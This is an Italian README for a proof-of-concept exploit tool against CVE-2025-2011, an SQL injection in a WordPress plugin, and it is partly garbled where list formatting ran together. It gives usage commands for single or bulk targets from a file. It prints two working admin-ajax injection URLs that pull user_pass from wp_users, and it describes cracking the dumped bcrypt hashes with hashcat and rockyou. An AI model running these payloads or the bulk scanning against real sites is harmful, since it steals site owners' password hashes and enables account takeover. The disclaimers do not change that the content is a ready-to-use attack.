
Exploit per CVE-2025-2011
Di: X3RX3S Ma orgogliosamente plagiato da Ash Wesker che ha usato GPT sul mio codice con il suo banner ;) vedi qui ---> https://github.com/Ashwesker/Blackash-CVE-2025-2011 Puoi persino vedere il mio nome utente nel 'suo' codice -_-'
Scopo: Un tool proof-of-concept per testare una vulnerabilità di SQL injection (CVE-2025-2011) su siti WordPress.
Disclaimer: Usalo solo su sistemi di tua proprietà o per cui hai un esplicito permesso scritto. I test non autorizzati sono illegali e non etici.

-p 1 o -p 2)$2a$, $2b$, $2y$), incluse le varianti con prefisso $wp$results_<hostname>.txt-m 3200) con richiesta di conferma-u) o più target tramite file (-f)requestscoloramaInstalla le dipendenze:
pip install requests colorama
Opzionale (per il cracking):
hashcat installato e disponibile nel tuo PATH (Il default è /usr/share/wordlists/rockyou.txt)/usr/share/wordlists/rockyou.txtRendi eseguibile lo script (opzionale):
chmod +x CVE-2025-2011.py
Target singolo (payload predefinito 1):
python3 CVE-2025-2011.py -u https://example.com
Target singolo (payload 2):
python3 CVE-2025-2011.py -u https://example.com -p 2
Più target da file (un URL per riga):
python3 CVE-2025-2011.py -f targets.txt
Per ogni host testato lo script salva un file di risultati:
results_<hostname>.txt
Se vengono trovati hash bcrypt, vengono salvati in hashes.txt e ti verrà chiesto se vuoi crackarli con Hashcat. Esempio di comando Hashcat usato dallo script:
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt
Nota: bcrypt è lento per progettazione. Il cracking può richiedere molto tempo e richiedere GPU.
/wp-admin/admin-ajax.php?action=depicter-lead-index&s=test%27)+UNION+select+user_pass,2,3,4,5+FROM+wp_users--+x
/wp-admin/admin-ajax.php?action=depicter-lead-list&s=test%27))+table_name+UNION+select+user_pass+FROM+wp_users--+x
Questo strumento è fornito solo a scopo educativo e difensivo. Non usarlo contro sistemi per cui non hai un permesso esplicito. L'autore e il distributore non si assumono alcuna responsabilità per un uso improprio. Ottieni sempre un'autorizzazione scritta prima di eseguire test su target che non possiedi.
run_hashcat nello script per indicare la tua lista preferita.